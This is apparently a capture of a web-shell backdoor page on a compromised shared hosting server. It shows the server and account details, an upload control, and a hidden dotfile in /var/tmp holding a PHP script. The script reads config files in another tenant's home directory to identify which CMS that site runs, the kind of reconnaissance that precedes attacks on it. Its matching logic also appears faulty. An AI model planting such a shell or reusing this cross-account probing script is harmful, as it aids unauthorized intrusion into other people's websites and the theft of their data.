HEX
Server: Apache
System: Linux pdx1-shared-a1-28 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_6nhrpv (6576398)
PHP: 8.2.26
Disabled: NONE
Upload Files
File: //var/tmp/.reset
<?php   $r = '/home/dh_udmsq7/dchyper.us'; $a = ['wp-config.php' => ['DB_PASSWORD' => 'wp'], 'index.php' => ['@package    Joomla.Site' => 'joomla', 'DRUPAL_ROOT' => 'drupal', 'use Magento\Framework\App\Bootstrap' => 'magento'], 'configuration.php' => ['JConfig' => 'joomla'], 'cron.php' => ['DRUPAL_ROOT' => 'drupal', 'Magento\Store\Model' => 'magento'], 'init.php' => ['Copyright since 2007 PrestaShop' => 'prestashop'], 'config.php' => ["define('DIR_APPLICATION'" => 'opencart']];  foreach ($a as $path => $patterns) {     $t = "{$r}/{$path}";     if (file_exists($t)) {         $c = file_get_contents($t);         foreach ($patterns as $p => $cms) {             if(strstr($c, $cms)) {                 die("<c>{$cms}</c>");             }         }     } } die('<c>unknown</c>');